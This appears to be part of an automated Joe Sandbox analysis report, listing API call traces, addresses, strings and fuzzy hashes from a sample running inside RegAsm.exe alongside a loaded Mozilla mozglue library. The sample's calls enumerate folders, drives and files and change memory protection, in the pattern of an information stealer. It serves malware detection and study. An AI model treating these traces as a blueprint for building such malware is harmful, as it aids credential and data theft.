                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (@
                                                                            • API String ID: 0-1346038526
                                                                            APIs
                                                                            • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-3916222277
                                                                            APIs
                                                                            • SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FolderPathlstrcpy
                                                                            • String ID: ;\B
                                                                            • API String ID: 1699248803-1503912327
                                                                            APIs
                                                                            • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileOperation
                                                                            • String ID: ^qA
                                                                            • API String ID: 3080627654-2929517337
                                                                            APIs
                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentProfile
                                                                            • String ID: Unknown
                                                                            • API String ID: 2104809126-1654365787
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00410CE2
                                                                            • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFileH_prolog
                                                                            • String ID:
                                                                            • API String ID: 3244726999-0
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                            • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                            • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                            • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                              • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2625060131-0
                                                                            • Opcode ID: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                            • Instruction ID: c334b669d827ce9460b6e052bb784494c4e07a697f8de2f8e66076f210601346
                                                                            • Opcode Fuzzy Hash: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                            • Instruction Fuzzy Hash: 63915F71D0024CEACF11EBE5D952BDEBBB8AF14308F10417EE44573282DA78570C8B66
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040A898
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                              • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$FileFindFirstlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1592259726-0
                                                                            • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                            • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                            • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                            • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00401EDB
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                              • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$FileFindFirstlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1592259726-0
                                                                            • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                            • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                            • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                            • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415A3F
                                                                              • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                              • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                              • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                              • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                              • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                              • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                              • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                            • String ID:
                                                                            • API String ID: 373919974-0
                                                                            • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                            • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                            • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                            • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocal
                                                                            • String ID:
                                                                            • API String ID: 3494564517-0
                                                                            • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                            • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                            • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                            • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0
                                                                            APIs
                                                                            • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC46CCC
                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D11
                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC46D26
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CC46D35
                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D53
                                                                            • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CC46D73
                                                                            • free.MOZGLUE(00000000), ref: 6CC46D80
                                                                            • CertGetNameStringW.CRYPT32 ref: 6CC46DC0
                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46DDC
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46DEB
                                                                            • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CC46DFF
                                                                            • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CC46E10
                                                                            • CryptMsgClose.CRYPT32(00000000), ref: 6CC46E27
                                                                            • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CC46E34
                                                                            • CreateFileW.KERNEL32 ref: 6CC46EF9
                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46F7D
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46F8C
                                                                            • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CC4709D
                                                                            • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC47103
                                                                            • free.MOZGLUE(00000000), ref: 6CC47153
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC47176
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC47209
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4723A
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4726B
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4729C
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC472DC
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4730D
                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC473C2
                                                                            • VerSetConditionMask.NTDLL ref: 6CC473F3
                                                                            • VerSetConditionMask.NTDLL ref: 6CC473FF
                                                                            • VerSetConditionMask.NTDLL ref: 6CC47406
                                                                            • VerSetConditionMask.NTDLL ref: 6CC4740D
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC4741A
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC4755A
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC47568
                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CC47585
                                                                            • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC47598
                                                                            • free.MOZGLUE(00000000), ref: 6CC475AC
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                            • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                            • API String ID: 3256780453-3980470659
                                                                            • Opcode ID: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                            • Instruction ID: b2ad0393ad0a2950369a9f34186a438842b6a6ed6c24aff6d90f3e4af8f3011c
                                                                            • Opcode Fuzzy Hash: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                            • Instruction Fuzzy Hash: 9B52C3B5A002149FEB21DF65CC84BAA77B8FF46704F10C199E909A7640EB71AF85CF91
                                                                            APIs
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                              • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                              • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                              • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                              • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                              • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                              • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                              • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                              • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7F155
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F1E0
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F1ED
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F212
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F229
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F231
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F248
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F2AE
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2BB
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2F8
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F350
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F35D
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F381
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F398
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F3A0
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F489
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F491
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F3CF
                                                                              • Part of subcall function 6CC7F070: GetCurrentThreadId.KERNEL32 ref: 6CC7F440
                                                                              • Part of subcall function 6CC7F070: AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F44D
                                                                              • Part of subcall function 6CC7F070: ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F472
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F4A8
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                            Strings
                                                                            • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                            • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                            • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                            • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                            • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                            • API String ID: 565197838-2840072211
                                                                            • Opcode ID: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                            • Instruction ID: d9f5fd634b95f1a07382b130cba07e18aeef792666b300a5973f8d0c8ac5d279
                                                                            • Opcode Fuzzy Hash: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                            • Instruction Fuzzy Hash: FDD1383D7042148FDB109FF9D4987AAB7B8EB46328F14451AF95593F81EB705808CBBA
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CC464DF
                                                                            • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CC464F2
                                                                            • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CC46505
                                                                            • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CC46518
                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4652B
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4671C
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC46724
                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC4672F
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC46759
                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC46764
                                                                            • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CC46A80
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC46ABE
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC46AD3
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AE8
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AF7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                            • API String ID: 487479824-2878602165
                                                                            • Opcode ID: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                            • Instruction ID: 0c5addb11b1d7d17326ea920779962a00a71723b413463e1f4d38d0b57080ddc
                                                                            • Opcode Fuzzy Hash: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                            • Instruction Fuzzy Hash: 28F1D470A05A199FDB20CF65CC8879AB7B4AF46318F14C299E809A7645F771AE84CF90
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,6CC7E2A6), ref: 6CC7E35E
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6CC7E2A6), ref: 6CC7E386
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E3E4
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E3F1
                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CC7E4AB
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E4F5
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E584
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E5DE
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7E8A6
                                                                              • Part of subcall function 6CC3B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC3B7CF
                                                                              • Part of subcall function 6CC3B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B808
                                                                              • Part of subcall function 6CC8B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6CCB0FB6,00000000,?,?,6CC7E69E), ref: 6CC8B830
                                                                            • memset.VCRUNTIME140(?,00000000,00000000), ref: 6CC7E6DA
                                                                              • Part of subcall function 6CC8B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6CC8B916
